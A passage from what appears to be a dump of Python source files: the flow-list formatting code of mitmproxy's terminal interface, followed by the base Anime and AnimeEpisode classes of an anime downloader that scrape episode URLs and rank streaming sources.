\"key\",\n value_format: str = \"text\",\n indent: int = 0\n) -> typing.List[urwid.Columns]:\n \"\"\"\n Format a list of (key, value) tuples.\n\n Args:\n entries: The list to format. 
keys must be strings, values can also be None or urwid widgets.\n The latter makes it possible to use the result of format_keyvals() as a value.\n key_format: The display attribute for the key.\n value_format: The display attribute for the value.\n indent: Additional indent to apply.\n \"\"\"\n max_key_len = max((len(k) for k, v in entries if k is not None), default=0)\n max_key_len = min(max_key_len, KEY_MAX)\n\n if indent > 2:\n indent -= 2 # We use dividechars=2 below, which already adds two empty spaces\n\n ret = []\n for k, v in entries:\n if v is None:\n v = urwid.Text(\"\")\n elif not isinstance(v, urwid.Widget):\n v = urwid.Text([(value_format, v)])\n ret.append(\n urwid.Columns(\n [\n (\"fixed\", indent, urwid.Text(\"\")),\n (\n \"fixed\",\n max_key_len,\n urwid.Text([(key_format, k)])\n ),\n v\n ],\n dividechars=2\n )\n )\n return ret\n\n\ndef fcol(s: str, attr: str) -> typing.Tuple[str, int, urwid.Text]:\n s = str(s)\n return (\n \"fixed\",\n len(s),\n urwid.Text(\n [\n (attr, s)\n ]\n )\n )\n\n\nif urwid.util.detected_encoding:\n SYMBOL_REPLAY = \"\\u21ba\"\n SYMBOL_RETURN = \"\\u2190\"\n SYMBOL_MARK = \"\\u25cf\"\n SYMBOL_UP = \"\\u21E7\"\n SYMBOL_DOWN = \"\\u21E9\"\n SYMBOL_ELLIPSIS = \"\\u2026\"\n SYMBOL_FROM_CLIENT = \"\\u21d2\"\n SYMBOL_TO_CLIENT = \"\\u21d0\"\nelse:\n SYMBOL_REPLAY = \"[r]\"\n SYMBOL_RETURN = \"<-\"\n SYMBOL_MARK = \"#\"\n SYMBOL_UP = \"^\"\n SYMBOL_DOWN = \" \"\n SYMBOL_ELLIPSIS = \"~\"\n SYMBOL_FROM_CLIENT = \"->\"\n SYMBOL_TO_CLIENT = \"<-\"\n\nSCHEME_STYLES = {\n 'http': 'scheme_http',\n 'https': 'scheme_https',\n 'ws': 'scheme_ws',\n 'wss': 'scheme_wss',\n 'tcp': 'scheme_tcp',\n 'dns': 'scheme_dns',\n}\nHTTP_REQUEST_METHOD_STYLES = {\n 'GET': 'method_get',\n 'POST': 'method_post',\n 'DELETE': 'method_delete',\n 'HEAD': 'method_head',\n 'PUT': 'method_put'\n}\nHTTP_RESPONSE_CODE_STYLE = {\n 2: \"code_200\",\n 3: \"code_300\",\n 4: \"code_400\",\n 5: \"code_500\",\n}\n\n\nclass RenderMode(enum.Enum):\n TABLE = 1\n \"\"\"The flow list in table format, i.e. one row per flow.\"\"\"\n LIST = 2\n \"\"\"The flow list in list format, i.e. potentially multiple rows per flow.\"\"\"\n DETAILVIEW = 3\n \"\"\"The top lines in the detail view.\"\"\"\n\n\ndef fixlen(s: str, maxlen: int) -> str:\n if len(s) <= maxlen:\n return s.ljust(maxlen)\n else:\n return s[0:maxlen - len(SYMBOL_ELLIPSIS)] + SYMBOL_ELLIPSIS\n\n\ndef fixlen_r(s: str, maxlen: int) -> str:\n if len(s) <= maxlen:\n return s.rjust(maxlen)\n else:\n return SYMBOL_ELLIPSIS + s[len(s) - maxlen + len(SYMBOL_ELLIPSIS):]\n\n\ndef render_marker(marker: str) -> str:\n rendered = emoji.emoji.get(marker, SYMBOL_MARK)\n\n # The marker can only be one glyph. Some emoji that use zero-width joiners (ZWJ)\n # will not be rendered as a single glyph and instead will show\n # multiple glyphs. 
Just use the first glyph as a fallback.\n # https://emojipedia.org/emoji-zwj-sequence/\n return rendered[0]\n\n\nclass TruncatedText(urwid.Widget):\n def __init__(self, text, attr, align='left'):\n self.text = text\n self.attr = attr\n self.align = align\n super().__init__()\n\n def pack(self, size, focus=False):\n return (len(self.text), 1)\n\n def rows(self, size, focus=False):\n return 1\n\n def render(self, size, focus=False):\n text = self.text\n attr = self.attr\n if self.align == 'right':\n text = text[::-1]\n attr = attr[::-1]\n\n text_len = urwid.util.calc_width(text, 0, len(text))\n if size is not None and len(size) > 0:\n width = size[0]\n else:\n width = text_len\n\n if width >= text_len:\n remaining = width - text_len\n if remaining > 0:\n c_text = text + ' ' * remaining\n c_attr = attr + [('text', remaining)]\n else:\n c_text = text\n c_attr = attr\n else:\n trim = urwid.util.calc_trim_text(text, 0, width - 1, 0, width - 1)\n visible_text = text[0:trim[1]]\n if trim[3] == 1:\n visible_text += ' '\n c_text = visible_text + SYMBOL_ELLIPSIS\n c_attr = (urwid.util.rle_subseg(attr, 0, len(visible_text.encode())) +\n [('focus', len(SYMBOL_ELLIPSIS.encode()))])\n\n if self.align == 'right':\n c_text = c_text[::-1]\n c_attr = c_attr[::-1]\n\n return urwid.TextCanvas([c_text.encode()], [c_attr], maxcol=width)\n\n\ndef truncated_plain(text, attr, align='left'):\n return TruncatedText(text, [(attr, len(text.encode()))], align)\n\n\n# Work around https://github.com/urwid/urwid/pull/330\ndef rle_append_beginning_modify(rle, a_r):\n \"\"\"\n Append (a, r) (unpacked from *a_r*) to BEGINNING of rle.\n Merge with first run when possible\n\n MODIFIES rle parameter contents. Returns None.\n \"\"\"\n a, r = a_r\n if not rle:\n rle[:] = [(a, r)]\n else:\n al, run = rle[0]\n if a == al:\n rle[0] = (a, run + r)\n else:\n rle[0:0] = [(a, r)]\n\n\ndef colorize_host(host):\n tld = get_tld(host)\n sld = get_sld(host)\n\n attr = []\n\n tld_size = len(tld)\n sld_size = len(sld) - tld_size\n\n for letter in reversed(range(len(host))):\n character = host[letter]\n if tld_size > 0:\n style = 'url_domain'\n tld_size -= 1\n elif tld_size == 0:\n style = 'text'\n tld_size -= 1\n elif sld_size > 0:\n sld_size -= 1\n style = 'url_extension'\n else:\n style = 'text'\n rle_append_beginning_modify(attr, (style, len(character.encode())))\n return attr\n\n\ndef colorize_req(s):\n path = s.split('?', 2)[0]\n i_query = len(path)\n i_last_slash = path.rfind('/')\n i_ext = path[i_last_slash + 1:].rfind('.')\n i_ext = i_last_slash + i_ext if i_ext >= 0 else len(s)\n in_val = False\n attr = []\n for i in range(len(s)):\n c = s[i]\n if ((i < i_query and c == '/') or\n (i < i_query and i > i_last_slash and c == '.') or\n (i == i_query)):\n a = 'url_punctuation'\n elif i > i_query:\n if in_val:\n if c == '&':\n in_val = False\n a = 'url_punctuation'\n else:\n a = 'url_query_value'\n else:\n if c == '=':\n in_val = True\n a = 'url_punctuation'\n else:\n a = 'url_query_key'\n elif i > i_ext:\n a = 'url_extension'\n elif i > i_last_slash:\n a = 'url_filename'\n else:\n a = 'text'\n urwid.util.rle_append_modify(attr, (a, len(c.encode())))\n return attr\n\n\ndef colorize_url(url):\n parts = url.split('/', 3)\n if len(parts) < 4 or len(parts[1]) > 0 or parts[0][-1:] != ':':\n return [('error', len(url))] # bad URL\n return [\n (SCHEME_STYLES.get(parts[0], \"scheme_other\"), len(parts[0]) - 1),\n ('url_punctuation', 3), # ://\n ] + colorize_host(parts[2]) + colorize_req('/' + parts[3])\n\n\ndef format_http_content_type(content_type: 
str) -> typing.Tuple[str, str]:\n content_type = content_type.split(\";\")[0]\n if content_type.endswith('/javascript'):\n style = 'content_script'\n elif content_type.startswith('text/'):\n style = 'content_text'\n elif (content_type.startswith('image/') or\n content_type.startswith('video/') or\n content_type.startswith('font/') or\n \"/x-font-\" in content_type):\n style = 'content_media'\n elif content_type.endswith('/json') or content_type.endswith('/xml'):\n style = 'content_data'\n elif content_type.startswith('application/'):\n style = 'content_raw'\n else:\n style = 'content_other'\n return content_type, style\n\n\ndef format_duration(duration: float) -> typing.Tuple[str, str]:\n pretty_duration = human.pretty_duration(duration)\n style = 'gradient_%02d' % int(99 - 100 * min(math.log2(1 + 1000 * duration) / 12, 0.99))\n return pretty_duration, style\n\n\ndef format_size(num_bytes: int) -> typing.Tuple[str, str]:\n pretty_size = human.pretty_size(num_bytes)\n style = 'gradient_%02d' % int(99 - 100 * min(math.log2(1 + num_bytes) / 20, 0.99))\n return pretty_size, style\n\n\ndef format_left_indicators(\n *,\n focused: bool,\n intercepted: bool,\n timestamp: float\n):\n indicators: typing.List[typing.Union[str, typing.Tuple[str, str]]] = []\n if focused:\n indicators.append((\"focus\", \">>\"))\n else:\n indicators.append(\" \")\n pretty_timestamp = human.format_timestamp(timestamp)[-8:]\n if intercepted:\n indicators.append((\"intercept\", pretty_timestamp))\n else:\n indicators.append((\"text\", pretty_timestamp))\n return \"fixed\", 10, urwid.Text(indicators)\n\n\ndef format_right_indicators(\n *,\n replay: bool,\n marked: str,\n):\n indicators: typing.List[typing.Union[str, typing.Tuple[str, str]]] = []\n if replay:\n indicators.append((\"replay\", SYMBOL_REPLAY))\n else:\n indicators.append(\" \")\n if bool(marked):\n indicators.append((\"mark\", render_marker(marked)))\n else:\n indicators.append(\" \")\n return \"fixed\", 3, urwid.Text(indicators)\n\n\n@lru_cache(maxsize=800)\ndef format_http_flow_list(\n *,\n render_mode: RenderMode,\n focused: bool,\n marked: str,\n is_replay: bool,\n request_method: str,\n request_scheme: str,\n request_host: str,\n request_path: str,\n request_url: str,\n request_http_version: str,\n request_timestamp: float,\n request_is_push_promise: bool,\n intercepted: bool,\n response_code: typing.Optional[int],\n response_reason: typing.Optional[str],\n response_content_length: typing.Optional[int],\n response_content_type: typing.Optional[str],\n duration: typing.Optional[float],\n error_message: typing.Optional[str],\n) -> urwid.Widget:\n req = []\n\n if render_mode is RenderMode.DETAILVIEW:\n req.append(fcol(human.format_timestamp(request_timestamp), \"highlight\"))\n else:\n if focused:\n req.append(fcol(\">>\", \"focus\"))\n else:\n req.append(fcol(\" \", \"focus\"))\n\n method_style = HTTP_REQUEST_METHOD_STYLES.get(request_method, \"method_other\")\n req.append(fcol(request_method, method_style))\n\n if request_is_push_promise:\n req.append(fcol('PUSH_PROMISE', 'method_http2_push'))\n\n preamble_len = sum(x[1] for x in req) + len(req) - 1\n\n if request_http_version not in (\"HTTP/1.0\", \"HTTP/1.1\"):\n request_url += \" \" + request_http_version\n if intercepted and not response_code:\n url_style = \"intercept\"\n elif response_code or error_message:\n url_style = \"text\"\n else:\n url_style = \"title\"\n\n if render_mode is RenderMode.DETAILVIEW:\n req.append(\n urwid.Text([(url_style, request_url)])\n )\n else:\n 
req.append(truncated_plain(request_url, url_style))\n\n req.append(format_right_indicators(replay=is_replay, marked=marked))\n\n resp = [\n (\"fixed\", preamble_len, urwid.Text(\"\"))\n ]\n if response_code:\n if intercepted:\n style = \"intercept\"\n else:\n style = \"\"\n\n status_style = style or HTTP_RESPONSE_CODE_STYLE.get(response_code // 100, \"code_other\")\n resp.append(fcol(SYMBOL_RETURN, status_style))\n resp.append(fcol(str(response_code), status_style))\n if response_reason and render_mode is RenderMode.DETAILVIEW:\n resp.append(fcol(response_reason, status_style))\n\n if response_content_type:\n ct, ct_style = format_http_content_type(response_content_type)\n resp.append(fcol(ct, style or ct_style))\n\n if response_content_length:\n size, size_style = format_size(response_content_length)\n elif response_content_length == 0:\n size = \"[no content]\"\n size_style = \"text\"\n else:\n size = \"[content missing]\"\n size_style = \"text\"\n resp.append(fcol(size, style or size_style))\n\n if duration:\n dur, dur_style = format_duration(duration)\n resp.append(fcol(dur, style or dur_style))\n elif error_message:\n resp.append(fcol(SYMBOL_RETURN, \"error\"))\n resp.append(urwid.Text([(\"error\", error_message)]))\n\n return urwid.Pile([\n urwid.Columns(req, dividechars=1),\n urwid.Columns(resp, dividechars=1)\n ])\n\n\n@lru_cache(maxsize=800)\ndef format_http_flow_table(\n *,\n render_mode: RenderMode,\n focused: bool,\n marked: str,\n is_replay: typing.Optional[str],\n request_method: str,\n request_scheme: str,\n request_host: str,\n request_path: str,\n request_url: str,\n request_http_version: str,\n request_timestamp: float,\n request_is_push_promise: bool,\n intercepted: bool,\n response_code: typing.Optional[int],\n response_reason: typing.Optional[str],\n response_content_length: typing.Optional[int],\n response_content_type: typing.Optional[str],\n duration: typing.Optional[float],\n error_message: typing.Optional[str],\n) -> urwid.Widget:\n items = [\n format_left_indicators(\n focused=focused,\n intercepted=intercepted,\n timestamp=request_timestamp\n )\n ]\n\n if intercepted and not response_code:\n request_style = \"intercept\"\n else:\n request_style = \"\"\n\n scheme_style = request_style or SCHEME_STYLES.get(request_scheme, \"scheme_other\")\n items.append(fcol(fixlen(request_scheme.upper(), 5), scheme_style))\n\n if request_is_push_promise:\n method_style = 'method_http2_push'\n else:\n method_style = request_style or HTTP_REQUEST_METHOD_STYLES.get(request_method, \"method_other\")\n items.append(fcol(fixlen(request_method, 4), method_style))\n\n items.append(('weight', 0.25, TruncatedText(request_host, colorize_host(request_host), 'right')))\n items.append(('weight', 1.0, TruncatedText(request_path, colorize_req(request_path), 'left')))\n\n if intercepted and response_code:\n response_style = \"intercept\"\n else:\n response_style = \"\"\n\n if response_code:\n\n status = str(response_code)\n status_style = response_style or HTTP_RESPONSE_CODE_STYLE.get(response_code // 100, \"code_other\")\n\n if response_content_length and response_content_type:\n content, content_style = format_http_content_type(response_content_type)\n content_style = response_style or content_style\n elif response_content_length:\n content = ''\n content_style = 'content_none'\n elif response_content_length == 0:\n content = \"[no content]\"\n content_style = 'content_none'\n else:\n content = \"[content missing]\"\n content_style = 'content_none'\n\n elif error_message:\n status = 'err'\n 
status_style = 'error'\n content = error_message\n content_style = 'error'\n\n else:\n status = ''\n status_style = 'text'\n content = ''\n content_style = ''\n\n items.append(fcol(fixlen(status, 3), status_style))\n items.append(('weight', 0.15, truncated_plain(content, content_style, 'right')))\n\n if response_content_length:\n size, size_style = format_size(response_content_length)\n items.append(fcol(fixlen_r(size, 5), response_style or size_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n if duration:\n duration_pretty, duration_style = format_duration(duration)\n items.append(fcol(fixlen_r(duration_pretty, 5), response_style or duration_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n items.append(format_right_indicators(\n replay=bool(is_replay),\n marked=marked,\n ))\n return urwid.Columns(items, dividechars=1, min_width=15)\n\n\n@lru_cache(maxsize=800)\ndef format_tcp_flow(\n *,\n render_mode: RenderMode,\n focused: bool,\n timestamp_start: float,\n marked: str,\n client_address,\n server_address,\n total_size: int,\n duration: typing.Optional[float],\n error_message: typing.Optional[str],\n):\n conn = f\"{human.format_address(client_address)} <-> {human.format_address(server_address)}\"\n\n items = []\n\n if render_mode in (RenderMode.TABLE, RenderMode.DETAILVIEW):\n items.append(\n format_left_indicators(focused=focused, intercepted=False, timestamp=timestamp_start)\n )\n else:\n if focused:\n items.append(fcol(\">>\", \"focus\"))\n else:\n items.append(fcol(\" \", \"focus\"))\n\n if render_mode is RenderMode.TABLE:\n items.append(fcol(\"TCP \", SCHEME_STYLES[\"tcp\"]))\n else:\n items.append(fcol(\"TCP\", SCHEME_STYLES[\"tcp\"]))\n\n items.append(('weight', 1.0, truncated_plain(conn, \"text\", 'left')))\n if error_message:\n items.append(('weight', 1.0, truncated_plain(error_message, \"error\", 'left')))\n\n if total_size:\n size, size_style = format_size(total_size)\n items.append(fcol(fixlen_r(size, 5), size_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n if duration:\n duration_pretty, duration_style = format_duration(duration)\n items.append(fcol(fixlen_r(duration_pretty, 5), duration_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n items.append(format_right_indicators(replay=False, marked=marked))\n\n return urwid.Pile([\n urwid.Columns(items, dividechars=1, min_width=15)\n ])\n\n\n@lru_cache(maxsize=800)\ndef format_dns_flow(\n *,\n render_mode: RenderMode,\n focused: bool,\n intercepted: bool,\n marked: str,\n is_replay: typing.Optional[str],\n op_code: str,\n request_timestamp: float,\n domain: str,\n type: str,\n response_code: typing.Optional[str],\n response_code_http_equiv: int,\n answer: typing.Optional[str],\n error_message: str,\n duration: typing.Optional[float],\n):\n items = []\n\n if render_mode in (RenderMode.TABLE, RenderMode.DETAILVIEW):\n items.append(format_left_indicators(focused=focused, intercepted=intercepted, timestamp=request_timestamp))\n else:\n items.append(fcol(\">>\" if focused else \" \", \"focus\"))\n\n scheme_style = \"intercepted\" if intercepted else SCHEME_STYLES[\"dns\"]\n t = f\"DNS {op_code}\"\n if render_mode is RenderMode.TABLE:\n t = fixlen(t, 10)\n items.append(fcol(t, scheme_style))\n items.append(('weight', 0.5, TruncatedText(domain, colorize_host(domain), 'right')))\n items.append(fcol(\"(\" + fixlen(type, 5)[:len(type)] + \") =\", \"text\"))\n\n items.append((\"weight\", 1, (\n truncated_plain(\"...\" if answer is None else \"?\" if not answer 
else answer, \"text\")\n if error_message is None else\n truncated_plain(error_message, \"error\")\n )))\n status_style = \"intercepted\" if intercepted else HTTP_RESPONSE_CODE_STYLE.get(response_code_http_equiv // 100, \"code_other\")\n items.append(fcol(fixlen(\"\" if response_code is None else response_code, 9), status_style))\n\n if duration:\n duration_pretty, duration_style = format_duration(duration)\n items.append(fcol(fixlen_r(duration_pretty, 5), duration_style))\n else:\n items.append((\"fixed\", 5, urwid.Text(\"\")))\n\n items.append(format_right_indicators(\n replay=bool(is_replay),\n marked=marked,\n ))\n return urwid.Pile([\n urwid.Columns(items, dividechars=1, min_width=15)\n ])\n\n\ndef format_flow(\n f: flow.Flow,\n *,\n render_mode: RenderMode,\n hostheader: bool = False, # pass options directly if we need more stuff from them\n focused: bool = True,\n) -> urwid.Widget:\n \"\"\"\n This functions calls the proper renderer depending on the flow type.\n We also want to cache the renderer output, so we extract all attributes\n relevant for display and call the render with only that. This assures that rows\n are updated if the flow is changed.\n \"\"\"\n duration: typing.Optional[float]\n error_message: typing.Optional[str]\n if f.error:\n error_message = f.error.msg\n else:\n error_message = None\n\n if isinstance(f, TCPFlow):\n total_size = 0\n for message in f.messages:\n total_size += len(message.content)\n if f.messages:\n duration = f.messages[-1].timestamp - f.client_conn.timestamp_start\n else:\n duration = None\n return format_tcp_flow(\n render_mode=render_mode,\n focused=focused,\n timestamp_start=f.client_conn.timestamp_start,\n marked=f.marked,\n client_address=f.client_conn.peername,\n server_address=f.server_conn.address,\n total_size=total_size,\n duration=duration,\n error_message=error_message,\n )\n elif isinstance(f, DNSFlow):\n if f.response:\n duration = f.response.timestamp - f.request.timestamp\n response_code_str: typing.Optional[str] = dns.response_codes.to_str(f.response.response_code)\n response_code_http_equiv = dns.response_codes.http_equiv_status_code(f.response.response_code)\n answer = \", \".join(str(x) for x in f.response.answers)\n else:\n duration = None\n response_code_str = None\n response_code_http_equiv = 0\n answer = None\n return format_dns_flow(\n render_mode=render_mode,\n focused=focused,\n intercepted=f.intercepted,\n marked=f.marked,\n is_replay=f.is_replay,\n op_code=dns.op_codes.to_str(f.request.op_code),\n request_timestamp=f.request.timestamp,\n domain=f.request.questions[0].name if f.request.questions else \"\",\n type=dns.types.to_str(f.request.questions[0].type) if f.request.questions else \"\",\n response_code=response_code_str,\n response_code_http_equiv=response_code_http_equiv,\n answer=answer,\n error_message=error_message,\n duration=duration,\n )\n elif isinstance(f, HTTPFlow):\n intercepted = f.intercepted\n response_content_length: typing.Optional[int]\n if f.response:\n if f.response.raw_content is not None:\n response_content_length = len(f.response.raw_content)\n else:\n response_content_length = None\n response_code: typing.Optional[int] = f.response.status_code\n response_reason: typing.Optional[str] = f.response.reason\n response_content_type = f.response.headers.get(\"content-type\")\n if f.response.timestamp_end:\n duration = max([f.response.timestamp_end - f.request.timestamp_start, 0])\n else:\n duration = None\n else:\n response_content_length = None\n response_code = None\n response_reason = None\n 
response_content_type = None\n duration = None\n\n scheme = f.request.scheme\n if f.websocket is not None:\n if scheme == \"https\":\n scheme = \"wss\"\n elif scheme == \"http\":\n scheme = \"ws\"\n\n if render_mode in (RenderMode.LIST, RenderMode.DETAILVIEW):\n render_func = format_http_flow_list\n else:\n render_func = format_http_flow_table\n return render_func(\n render_mode=render_mode,\n focused=focused,\n marked=f.marked,\n is_replay=f.is_replay,\n request_method=f.request.method,\n request_scheme=scheme,\n request_host=f.request.pretty_host if hostheader else f.request.host,\n request_path=f.request.path,\n request_url=f.request.pretty_url if hostheader else f.request.url,\n request_http_version=f.request.http_version,\n request_timestamp=f.request.timestamp_start,\n request_is_push_promise='h2-pushed-stream' in f.metadata,\n intercepted=intercepted,\n response_code=response_code,\n response_reason=response_reason,\n response_content_length=response_content_length,\n response_content_type=response_content_type,\n duration=duration,\n error_message=error_message,\n )\n\n else:\n raise NotImplementedError()\n"} {"ext": "py", "sha": "1a3006a452cdbbb51f2df48ae8cc8d6376c541f9", "content": "\"\"\"\nanime.py contains the base classes required for other anime classes.\n\"\"\"\nimport os\nimport logging\nimport copy\nimport importlib\n\nfrom anime_downloader.sites.exceptions import AnimeDLError, NotFoundError\nfrom anime_downloader import util\nfrom anime_downloader.config import Config\nfrom anime_downloader.extractors import get_extractor\nfrom anime_downloader.downloader import get_downloader\n\nlogger = logging.getLogger(__name__)\n\n\nclass Anime:\n \"\"\"\n Base class for all anime classes.\n\n Parameters\n ----------\n url: string\n URL of the anime.\n quality: One of ['360p', '480p', '720p', '1080p']\n Quality of episodes\n fallback_qualities: list\n The order of fallback.\n\n Attributes\n ----------\n sitename: str\n name of the site\n title: str\n Title of the anime\n meta: dict\n metadata about the anime. 
[Can be empty]\n QUALITIES: list\n Possible qualities for the site\n \"\"\"\n sitename = ''\n title = ''\n meta = dict()\n subclasses = {}\n QUALITIES = ['360p', '480p', '720p', '1080p']\n\n @classmethod\n def search(cls, query):\n \"\"\"\n Search searches for the anime using the query given.\n\n Parameters\n ----------\n query: str\n query is the query keyword to be searched.\n\n Returns\n -------\n list\n List of :py:class:`~anime_downloader.sites.anime.SearchResult`\n \"\"\"\n return\n\n def __init__(self, url=None, quality='720p',\n fallback_qualities=None,\n _skip_online_data=False):\n self.url = url\n\n if fallback_qualities is None:\n fallback_qualities = ['720p', '480p', '360p']\n\n self._fallback_qualities = [\n q for q in fallback_qualities if q in self.QUALITIES]\n\n if quality in self.QUALITIES:\n self.quality = quality\n else:\n raise AnimeDLError(\n 'Quality {0} not found in {1}'.format(quality, self.QUALITIES))\n\n if not _skip_online_data:\n logger.info('Extracting episode info from page')\n self._episode_urls = self.get_data()\n self._len = len(self._episode_urls)\n\n @classmethod\n def verify_url(cls, url):\n if cls.sitename in url:\n return True\n return False\n\n @property\n def config(self):\n return Config['siteconfig'][self.sitename]\n\n def __init_subclass__(cls, sitename, **kwargs):\n super().__init_subclass__(**kwargs)\n cls.subclasses[sitename] = cls\n\n @classmethod\n def factory(cls, sitename: str):\n \"\"\"\n factory returns the appropriate subclass for the given site name.\n\n Parameters\n ----------\n sitename: str\n sitename is the name of the site\n\n Returns\n -------\n subclass of :py:class:`Anime`\n Sub class of :py:class:`Anime`\n \"\"\"\n return cls.subclasses[sitename]\n\n @classmethod\n def new_anime(cls, sitename: str):\n \"\"\"\n new_anime is a factory which returns the anime class corresposing to\n `sitename`\n\n Returns\n -------\n subclass of Anime\n \"\"\"\n module = importlib.import_module(\n 'anime_downloader.sites.{}'.format(sitename)\n )\n for c in dir(module):\n if issubclass(c, cls):\n return c\n raise ImportError(\"Cannot find subclass of {}\".format(cls))\n\n def get_data(self):\n \"\"\"\n get_data is called inside the :code:`__init__` of\n :py:class:`~anime_downloader.sites.anime.BaseAnime`. 
It is used to get\n the necessary data about the anime and it's episodes.\n\n This function calls\n :py:class:`~anime_downloader.sites.anime.BaseAnime._scarpe_episodes`\n and\n :py:class:`~anime_downloader.sites.anime.BaseAnime._scrape_metadata`\n\n TODO: Refactor this so that classes which need not be soupified don't\n have to overload this function.\n\n Returns\n -------\n list\n A list of tuples of episodes containing episode name and\n episode url.\n Ex::\n [('1', 'https://9anime.is/.../...', ...)]\n\n \"\"\"\n self._episode_urls = []\n try:\n self._scrape_metadata()\n except Exception as e:\n logger.debug('Metadata scraping error: {}'.format(e))\n\n self._episode_urls = self._scrape_episodes()\n self._len = len(self._episode_urls)\n\n logger.debug('EPISODE IDS: length: {}, ids: {}'.format(\n self._len, self._episode_urls))\n\n if not isinstance(self._episode_urls[0], tuple):\n self._episode_urls = [(no+1, id) for no, id in\n enumerate(self._episode_urls)]\n\n return self._episode_urls\n\n def __getitem__(self, index):\n episode_class = AnimeEpisode.subclasses[self.sitename]\n if isinstance(index, int):\n try:\n ep_id = self._episode_urls[index]\n except IndexError as e:\n raise RuntimeError(\"No episode found with index\") from e\n return episode_class(ep_id[1], parent=self,\n ep_no=ep_id[0])\n elif isinstance(index, slice):\n anime = copy.deepcopy(self)\n try:\n anime._episode_urls = anime._episode_urls[index]\n except IndexError as e:\n raise RuntimeError(\"No episode found with index\") from e\n return anime\n return None\n\n def __iter__(self):\n episode_class = AnimeEpisode.subclasses[self.sitename]\n for ep_id in self._episode_urls:\n yield episode_class(ep_id[1], parent=self, ep_no=ep_id[0])\n\n def __repr__(self):\n return '''\nSite: {name}\nAnime: {title}\nEpisode count: {length}\n'''.format(name=self.sitename, title=self.title, length=len(self))\n\n def __len__(self):\n return self._len\n\n def __str__(self):\n return self.title\n\n def _scarpe_episodes(self):\n \"\"\"\n _scarpe_episodes is function which has to be overridden by the base\n classes to scrape the episode urls from the web page.\n\n Parameters\n ----------\n soup: `bs4.BeautifulSoup`\n soup is the html of the anime url after passing through\n BeautifulSoup.\n\n Returns\n -------\n :code:`list` of :code:`str`\n A list of episode urls.\n \"\"\"\n return\n\n def _scrape_metadata(self):\n \"\"\"\n _scrape_metadata is function which has to be overridden by the base\n classes to scrape the metadata of anime from the web page.\n\n Parameters\n ----------\n soup: :py:class:`bs4.BeautifulSoup`\n soup is the html of the anime url after passing through\n BeautifulSoup.\n \"\"\"\n return\n\n\nclass AnimeEpisode:\n \"\"\"\n Base class for all Episode classes.\n\n Parameters\n ----------\n url: string\n URL of the episode.\n quality: One of ['360p', '480p', '720p', '1080p']\n Quality of episode\n fallback_qualities: list\n The order of fallback.\n\n Attributes\n ----------\n sitename: str\n name of the site\n title: str\n Title of the anime\n meta: dict\n metadata about the anime. 
[Can be empty]\n ep_no: string\n Episode number/title of the episode\n pretty_title: string\n Pretty title of episode in format -\n \"\"\"\n QUALITIES = []\n title = ''\n stream_url = ''\n subclasses = {}\n\n def __init__(self, url, parent: Anime = None, ep_no=None):\n\n self.ep_no = ep_no\n self.url = url\n self.quality = parent.quality\n self.QUALITIES = parent.QUALITIES\n self._parent = parent\n self._sources = None\n self.pretty_title = '{}-{}'.format(self._parent.title, self.ep_no)\n\n logger.debug(\"Extracting stream info of id: {}\".format(self.url))\n\n def try_data():\n self.get_data()\n # Just to verify the source is acquired\n self.source().stream_url\n try:\n try_data()\n except NotFoundError:\n # Issue #28\n qualities = copy.copy(self._parent._fallback_qualities)\n try:\n qualities.remove(self.quality)\n except ValueError:\n pass\n for quality in qualities:\n logger.warning('Quality {} not found. Trying {}.'.format(\n self.quality, quality))\n self.quality = quality\n try:\n try_data()\n return\n except NotFoundError:\n pass\n logger.warning(f'Skipping episode: {self.ep_no}')\n\n def __init_subclass__(cls, sitename: str, **kwargs):\n super().__init_subclass__(**kwargs)\n cls.subclasses[sitename] = cls\n cls.sitename = sitename\n\n @classmethod\n def factory(cls, sitename: str):\n return cls.subclasses[sitename]\n\n @property\n def config(self):\n return Config['siteconfig'][self.sitename]\n\n def source(self, index=0):\n \"\"\"\n Get the source for episode\n\n Returns\n -------\n `anime_downloader.extractors.base_extractor.BaseExtractor`\n Extractor depending on the source.\n \"\"\"\n if not self._sources:\n self.get_data()\n try:\n sitename, url = self._sources[index]\n except TypeError:\n return self._sources[index]\n except IndexError:\n raise NotFoundError(\"No episode sources found.\")\n\n ext = get_extractor(sitename)(url, quality=self.quality)\n self._sources[index] = ext\n\n return ext\n\n def get_data(self):\n self._sources = self._get_sources()\n logger.debug('Sources : {}'.format(self._sources))\n\n def _get_sources(self):\n raise NotImplementedError\n\n\n def sort_sources(self, data):\n \"\"\"\n Formatted data should look something like this\n \n [\n {'extractor': 'mp4upload', 'url': 'https://twist.moe/mp4upload/...', 'server': 'mp4upload', 'version': 'subbed'}, \n {'extractor': 'vidstream', 'url': 'https://twist.moe/vidstream/...', 'server': 'vidstream', 'version': 'dubbed'},\n {'extractor': 'no_extractor', 'url': 'https://twist.moe/anime/...', 'server': 'default', 'version': 'subbed'}\n ]\n\n extractor = the extractor the link should be passed to\n url = url to be passed to the extractor\n server = the server name used in config\n version = subbed/dubbed\n\n The config should consist of a list with servers in preferred order and a preferred language, eg\n \n \"servers\":[\"vidstream\",\"default\",\"mp4upload\"],\n \"version\":\"subbed\"\n\n Using the example above, this function will return: [('no_extractor', 'https://twist.moe/anime/...')]\n as it prioritizes preferred language over preferred server\n \"\"\"\n\n version = self.config.get('version','subbed') #TODO add a flag for this\n servers = self.config.get('servers',[''])\n\n logger.debug('Data : {}'.format(data))\n\n #Sorts the dicts by preferred server in config\n sorted_by_server = sorted(data, key=lambda x: servers.index(x['server']) if x['server'] in servers else len(data))\n\n #Sorts the above by preferred language \n #resulting in a list with the dicts sorted by language and server\n #with language 
